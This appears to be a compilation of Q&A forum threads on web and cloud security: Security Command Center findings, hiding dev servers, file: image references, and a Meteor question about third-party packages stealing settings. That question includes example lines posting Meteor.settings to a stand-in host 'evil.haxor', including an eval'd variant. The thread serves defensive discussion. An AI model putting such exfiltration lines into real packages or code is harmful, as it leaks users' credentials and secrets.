Vulnerabilities shown in Security Command Center (SCC) Dashboard in Google Cloud

Vulnerabilities shown in Security Command Center Dashboard
The Security Command Center dashboard in Google Cloud shows a number of vulnerabilities. We have fixed a few of the issues, but it's not clear how to initiate another assessment of the vulnerabilities seen across all assets. How can we trigger this?

There are 2 types of vulnerabilities shown in the Security Command Center:
Security Health Analytics: this one (currently in beta) runs automatically twice a day, 12 hours apart. As of now it can't be triggered manually.
Web Security Scanner: this one essentially displays the results of the Web Security Scan, which you can set up and run yourself as described here.

I guess that you want to relaunch a scan to see whether your actions are now "green". However, keep in mind that the goal is not to have 0 vulnerabilities reported by SCC, but to have 0 issues that violate YOUR security policy.
For example, a firewall rule open to 0.0.0.0/0 will appear as a vulnerability. It could be one, or not. If you have a load balancer, created manually or by GKE, this firewall rule is created automatically. Is it a vulnerability?
Yes, if you don't want any external access.
No, if it's your website and you want to allow people across the world to browse it.
The same goes for a bucket with public access. Public for serving static content like images or videos? Or public with restricted data that nobody outside the company should see?
SCC is simply a tool, act wisely!
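For example, to review which firewall rules are actually open to the world before deciding whether a finding matters, something like the following can help (a sketch; the filter expression may need adjusting for your project):

gcloud compute firewall-rules list \
    --filter="sourceRanges:0.0.0.0/0" \
    --format="table(name, network, direction, sourceRanges.list())"

Whatever the listing shows, deciding whether each open rule is acceptable is your call, not SCC's.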

Related

How can I prevent 3rd-party packages from having direct access to Meteor.settings?

I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put it.
I use a 3rd party Meteor package such as iron:router, but possibly one by a lesser-known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP POST in which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) // all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I've tested, and these two things are allowed in 3rd party packages:
Meteor.settings.foo = "foobar" // why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") // nooooo
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all that's on their plate (Windows support, a non-Mongo DB). I just want to be able to provide this level of security to my company, whose auditors, I think, would be concerned to discover this level of openness. Otherwise I fear I'm stuck manually security-auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem. And the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should, be a notion of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the settings being (easily) modifiable at runtime, could be addressed by making the settings object read-only, using ES5 properties.
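A minimal sketch of that read-only idea, assuming it runs in server code loaded before any third-party package touches the settings (deepFreeze here is a hypothetical helper, not a Meteor API):

// Recursively freeze Meteor.settings so later assignments throw in strict mode
// (or fail silently otherwise). This does nothing to stop a package from reading it.
function deepFreeze(obj) {
  Object.getOwnPropertyNames(obj).forEach(function (key) {
    var value = obj[key];
    if (value && typeof value === 'object') {
      deepFreeze(value);
    }
  });
  return Object.freeze(obj);
}

if (Meteor.isServer) {
  deepFreeze(Meteor.settings);
}

After this, Meteor.settings.foo = "foobar" no longer sticks, though any package loaded earlier could already have copied the values.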
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
set up a firewall with outbound rules and logging (a rough sketch follows this list). Unfortunately, if your application communicates with any sort of social network (Facebook, Twitter) then the firewall idea will not handle malware that uses Twitter as a way to transmit data. But maybe it would help?
lock down DNS resolution and provide a whitelist of allowed lookups. This way you could spot if the app starts trying to communicate with 'evil.haxor'.
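As an illustration of the outbound-firewall idea, a sketch using iptables on the app host (the resolver and API addresses are placeholders):

# Default-deny outbound traffic, then allow only known destinations.
iptables -P OUTPUT DROP
iptables -A OUTPUT -o lo -j ACCEPT
# Allow replies on established connections and DNS to the approved resolver (placeholder IP).
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p udp --dport 53 -d 10.0.0.2 -j ACCEPT
# Allow the specific APIs the app legitimately needs (placeholder address).
iptables -A OUTPUT -d 203.0.113.10 -j ACCEPT
# Log everything else before the DROP policy discards it.
iptables -A OUTPUT -j LOG --log-prefix "egress-blocked: "

As noted above, this falls apart once the app legitimately talks to services that malware can also abuse.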
There are other, more advanced detectors - but at some point a hacker is going to go after the other services running on the box rather than try to modify your code.
Good luck. And it's good to be paranoid -- because they really are out to get you.

Is there any reason why a dev server should be accessible from the internet?

This is a very generic question that popped up in my mind. The reason is that I came across a website's dev server which leaked sensitive information about a database connection due to an error. I was stunned at first, and now I wonder why someone would put a development server out on the internet and make it accessible to everyone.
For me there is no reason for doing this.
But it certainly did not happen by accident that a company created a subdomain (dev.example.com) and pushed development code to it. So what could be the reason to ignore such a high security risk?
A quick search did not bring up any information about this. I'm interested in any further readings about this specific topic.
Thank you in advance
There is no reason for your dev servers to be accessible by the general public.
As a customer I just had an experience with a private chef site where I spent time interacting with their dev server because it had managed to get crawled by Bing. Everything was the same as the live site, but I got increasingly frustrated because paying a deposit failed to authorise. The customer support team had no idea I was on the wrong site either; the only difference was the URL. My e-mail address is now in their test system, which sends me spam every night when they do a test run.
Some options for you to consider, assuming you don't want to change the code on the page:
IP Whitelisting is the bare minimum
Have a separate login page that devs can use that redirects to the dev site with the correct auth token - bonus points for telling stray users that this is a test site and the live site is at https://.....
Use a robots.txt to make sure you don't get indexed (see the example after this list)
Hide it all behind a VNET - this really isn't an issue anymore with VPNs or services like Bastion.
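For the robots.txt point, a minimal file that asks crawlers to stay away from the entire dev site looks like this:

User-agent: *
Disallow: /

Keep in mind this only deters well-behaved crawlers; it is not an access control.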
Also consider the following so your devs/testers don't accidentally use the wrong site:
Have a dev CSS theme to make it obvious it's a test system (this assumes you do visual testing later in your pipeline)
Use a banner to make it clear this is a dev site (a minimal sketch follows this list)
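A minimal sketch of such a banner, as plain HTML/CSS injected only into dev builds (the wording and live-site URL are placeholders):

<!-- Fixed banner so the environment is unmistakable on every page -->
<div style="position:fixed; top:0; left:0; right:0; z-index:9999;
            background:#c00; color:#fff; text-align:center; padding:4px;">
  DEV ENVIRONMENT - test data only; the live site is at https://example.com
</div>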
Note that this would be a dev server. If you are using ringed/preview/progressive deployment then these should work just as well as the live site because they are the live site.
It's extremely common for a development environment, or any "lower level" environment for that matter, to be exposed to the public internet. Today, especially with more and more companies working in the public cloud and having remote team members, it's much more productive for development and UAT to happen without the need to set up a VPN connection or a faster, more expensive direct connection to the cloud from your company's on-premise network.
It's important to mention that exposing these environments to the public internet does not mean you shouldn't have some kind of HTTP authentication in front of them that hides the details of your website. You can also use a firewall with an IP address whitelist. This is still very important so you don't expose your product and lose a possible competitive advantage. It's also important because lower-level environments tend to be more error-prone, and important details about the inner workings of your application may accidentally show up.
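To make the combination concrete, here is a minimal sketch of an IP whitelist plus HTTP Basic authentication in front of a dev site, written as a small Node.js front end purely for illustration (the addresses, credentials, and port are placeholders; in practice the same checks usually live in a reverse proxy or firewall):

// Gate every request behind an IP allowlist plus HTTP Basic auth.
const http = require('http');

const ALLOWED_IPS = ['203.0.113.7', '127.0.0.1'];  // office / VPN addresses (placeholders)
const EXPECTED_AUTH =
  'Basic ' + Buffer.from('dev:s3cret').toString('base64');  // placeholder credentials

http.createServer((req, res) => {
  // Normalise IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1
  const ip = (req.socket.remoteAddress || '').replace(/^::ffff:/, '');
  if (!ALLOWED_IPS.includes(ip)) {
    res.writeHead(403);
    res.end('Forbidden');
    return;
  }
  if (req.headers.authorization !== EXPECTED_AUTH) {
    res.writeHead(401, { 'WWW-Authenticate': 'Basic realm="Dev environment"' });
    res.end('Authentication required');
    return;
  }
  res.writeHead(200);
  res.end('Hello from the dev environment');
}).listen(8080);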

Will referencing a website image on a local network compromise network security?

I manage a website for an organization that has a network where several hundred users will access it in any given 15-minute period. When a user opens a browser, the organization's homepage is displayed. This homepage has several images on it. To try to save on bandwidth to the remote web server (which is not at all affiliated with the local network), the index file checks the IP address of the requester, and if it is coming from within the network, it serves a modified webpage where the images are pulled from a local shared drive on the network.
Essentially, the code is this:
<img src="file:///D:/hp/picture.jpg" />
I've been told by the network administrator that this is unacceptable because of the great security risk it poses and that the folder must be deleted immediately.
I'm pretty sure it's not a risk, because it's the browser that requests the file from the local network, not the remote server, and the only way the picture could be displayed is if the request came from the local network, where all users have access to the drive in question anyway.
Is there something I am overlooking here? Can this single image tag cause a "great security risk" to the network?
Some background to prevent the obvious questions that will arise from this:
Browser caches are cleared every time a new user logs on to a machine. New users log in roughly every 15 minutes on over 500 machines.
I've requested to have a proxy cache server set up globally for the network. The network administrators flat out refused to do this
Hosting from within the network is out of the question (again, by the decree of the network administrator)
I have no control over the network or have any part in the decisions that are made.
Every user has read access to this shared drive and they all have write access to at least some of the 100 or so directories within it.
The network is not remotely accessible by remote users (you must be logged in to a machine physically plugged into the network to access the network or any drive on it)
Thanks in advance for your help on this.
Why don't you use the very same server which serves the shared directory to share the images over HTTP, and just use:
<img src="http://local-server/images/hp/picture.jpg" />
You already have a server, it's a matter of using the proper software.
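For instance, if Node happens to be available on that machine, a throwaway static file server over the shared directory could be as simple as the following (the path and port are placeholders; IIS or any other static file server would do the same job):

npx http-server D:/hp -p 8080

with the image tag then pointing at something like http://local-server:8080/picture.jpg.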
Regarding another of your points, it might be dangerous. You're allowing your browser to access local files requested by remote websites. I can't think of any exploits off the top of my head, but I'd rather avoid this sort of uncommon practice. You should not do something until you're sure it's safe (for now you're just unsure whether it's unsafe).
Is the tag itself a "great security risk"? Of course not -- any site can do the same (as you said, IE8 "happily opens everything you ask"). And therein lies the risk: should any website be allowed to coerce the client into opening arbitrary network files?
From a security standpoint, the problem is likely not the image tag itself, but rather that this functionality requires Internet sites to be allowed to access local resources (over the file: protocol) in the client's security context. Even with the same-origin policy, this is potentially dangerous, and consequently modern browsers do not allow it.
Beginning with IE9, Microsoft disallows accessing the file: protocol from sites in the Internet zone, and "strongly discourages" disabling this feature. Other modern browsers have similar functionality.
Presumably, the network administrators will eventually need to upgrade from IE8. Upgrading to a newer browser will prevent, by default, the locally-accessed images from loading. So the organization then ultimately has a few choices:
Turn off this security setting, allowing any website to reference local content
Not upgrade, and use IE8 in perpetuity
Run the website in the "Trusted Zone", which by default will permit the site to do anything the user can do (start processes, delete files, read data, etc.).
Develop custom software (BHOs, custom applications, HTAs, etc.) or use COTS software to load the images locally, bypassing the default IE behavior.
Accept the usability impact associated with not showing the local images
Option (1) is clearly a security issue, since it requires disabling a security setting that prevents non-local websites from reading local content. Option (2) presents its own security issues, since older browsers lack some of the security features of newer browsers (like blocking file: protocol access from the Internet zone). Option (3) requires an administrative configuration change, violates least-access principles, and (particularly if the site lacks server verification via SSL) opens the organization to a new and potentially devastating attack vector.
That leaves Option 4 -- development/deployment of software for this purpose; and Option 5 -- block the images from being displayed.
In the end, the administrators will likely have a strong security interest in moving away from IE8, and an implementation that relies on a behavior newer browsers do not support can impede such an upgrade and thus runs counter to the security interests of the organization.

Limit IP access by creating a new browser?

I don't know if this is the best approach, but here it is:
I've made a system in Django and only want the users in a lab to be able to access it, so they can't go to other web pages (it's a program where the students answer some tests).
I've read that the proxy approach to limiting IPs is very easily bypassed (since all the students are from IT).
Then I read somewhere that you can create your own "Chrome" or Firefox browser.
And it made me wonder if I can make a browser that can only access one domain (in this case my project's domain). This way it would be less obvious to the users what's going on.
But I can't find any good references for doing this, and I don't know how complicated it is.
Is it necessary to change the code of an existing browser, or can I just create an extension for it?
Why not run your test on an isolated private network where the only IP address the connected machines can reach is the one hosting the test? Any requests to external pages will fail because the Internet won't be reachable.
Editing a browser is possible, but it is likely to be simultaneously excessive for what you want and insufficient to stop users from getting content you don't want them to have.

How should I wall off the dev and/or beta sites -- from the public and search engine bots?

I need dev and beta sites hosted on the same server as the production environment (let's let that fly for practical reasons).
To keep things simple, I can accept the same protections in place on both dev and beta -- basically don't let it get spidered, and put something short of user names and passwords in place to prevent everyone and their brother from gaining access (again, there's a need to be practical). I realize that many people would want different permissions on dev than on beta, but that's not part of the requirements here.
Using a robots.txt file is a given, but then the question: should the additional host(s) (aka "subdomain(s)") be submitted to Google Webmaster Tools as an added preventive measure against inadvertent spidering? It should go without saying, but there will be no linking into the dev/beta sites directly, so you'd have to type in the address perfectly (with no augmentation by URL Rewrite or other assistance).
How could access be restricted to just our team? IP addresses won't work because of the various methods of internet access (meetings at lunch spots with wifi, etc.).
Perhaps have dev/beta and production INCLUDE a small file (or call a component) that looks for a URL variable to be set (on the dev/beta sites) or does not look for the URL variable (on the production site). This way you could leave a different INCLUDE or component (named the same) on the respective sites, and the source would otherwise not require a change when it's moved from development to production.
I really want to avoid full-on user authentication at any level (app level or web server), and I realize that leaves things pretty open, but the goal is really just to prevent inadvertent browsing of pre-production sites.
Usually I see web-server-based authentication with a single shared username and password for all users; this should be easy to set up. An interesting trick might be to check for a cookie instead, and then just have a better-hidden page that sets that cookie (a sketch follows). You can remove that page once everyone has visited it, or implement authentication just for that file, or allow access to it only from the office and require people working from home to use a VPN or visit the office if they clear their cookies.
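A minimal sketch of that cookie trick as a small Node.js front end, purely for illustration (the hidden path, cookie name, and port are placeholders; in practice the same check usually lives in the web server or app framework):

// A hidden URL sets a long-lived cookie; every other request is rejected without it.
const http = require('http');

const GATE_PATH = '/letmein-7f3a';          // the "better-hidden page" (placeholder)
const COOKIE = 'dev_access=granted';        // placeholder cookie name and value

http.createServer((req, res) => {
  if (req.url === GATE_PATH) {
    // Set the cookie for a year and bounce the visitor to the site root.
    res.writeHead(302, {
      'Set-Cookie': COOKIE + '; Max-Age=31536000; HttpOnly; Path=/',
      'Location': '/',
    });
    res.end();
    return;
  }
  const cookies = req.headers.cookie || '';
  if (!cookies.includes(COOKIE)) {
    res.writeHead(404);                     // pretend the site does not exist
    res.end();
    return;
  }
  res.writeHead(200);
  res.end('Pre-production site');
}).listen(8080);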
I have absolutely no idea if this is the "proper" way to go about doing it, but for us we place all Dev and Beta sites on very high port numbers that crawlers/spiders/indexers never go to (in fact, I don't know of any off the top of my head that go beyond port 80 unless they're following a direct link).
We then have a reference index page listing all of the sites with links to their respective port numbers, with only that page being password-protected. For sites involving real money transactions or other sensitive data, we display a short red bar on top of the website explaining that it is just a demo server, on the very rare chance that someone would directly go to a Dev URL and Port #.
The index page is also on a non-standard (!= 80) port. But even if a crawler were to reach it, it wouldn't get past the password input and would never find the direct links to all the other ports.
That way your developers can access the pages with direct URLs and Ports, and they have a password-protected index for backup should they forget.
